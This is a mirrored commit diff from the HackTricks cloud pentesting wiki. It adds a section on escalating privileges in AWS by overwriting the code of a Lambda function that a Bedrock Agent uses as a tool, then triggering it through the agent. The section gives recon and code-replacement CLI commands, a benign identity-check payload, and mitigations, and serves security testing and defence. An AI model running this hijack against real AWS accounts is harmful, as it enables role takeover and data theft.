gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-04-28 12:03:08 -07:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #281 from jFriedli/arte-jfriedli-aws-bedrock-lambda-privesc

Browse Source 
AWS Bedrock: Add Lambda Tool Hijacking Privilege Escalation (Agent Action Groups)
This commit is contained in:
SirBroccoli
2026-04-21 10:18:55 +02:00
committed by GitHub
parent 913bcb0f09 cda5427488
commit c7d8d96af8
1 changed files with 80 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

81
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
View File

@@ -29,7 +29,7 @@ List interpreters (control-plane) and inspect their configuration:
```bash ```bash
aws bedrock-agentcore-control list-code-interpreters aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID> aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
```` ```
> The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have. > The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have.
@@ -108,6 +108,84 @@ awscurl -X POST \
* Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary). * Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
* Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation. * Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation.
## Amazon Bedrock Agents
### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
Bedrock Agents can use **Lambda-backed action groups** as tools (external execution). If a principal can **modify the code of a Lambda function used by an agent**, and can then **invoke the agent**, they can execute attacker-controlled code under the **Lambda execution role**.
> [!NOTE]
> This is a **cross-service trust abuse** (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent.
#### Preconditions (common misconfiguration)
- A Bedrock Agent exists with an **action group backed by a Lambda function**
- The attacker has:
- `lambda:UpdateFunctionCode`
- `bedrock:InvokeAgent`
- The Lambda execution role has broader permissions than the attacker
- The attacker can identify the Lambda used by the agent
#### Recon
Enumerate agent action groups:
```bash
aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
```
Inspect Lambda:
```bash
aws lambda get-function --function-name <FUNCTION_NAME>
```
#### Exploitation
Replace Lambda code:
```bash
zip payload.zip lambda_function.py
aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip
```
Example payload:
```python
import boto3
def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()
```
Trigger via agent:
```bash
aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"
```
#### Impact
* **Privilege escalation** into Lambda execution role
* **Data exfiltration** from AWS services
* **Cross-service abuse** via trusted agent execution
#### Mitigations
* **Restrict** `lambda:UpdateFunctionCode`
* Use **least-privilege** Lambda roles
* **Monitor** Lambda code changes
* **Audit** Bedrock agent tool usage
## References ## References
- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/) - [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
@@ -116,6 +194,7 @@ awscurl -X POST \
- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) - [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html) - [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html) - [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
{{#include ../../../../banners/hacktricks-training.md}} {{#include ../../../../banners/hacktricks-training.md}}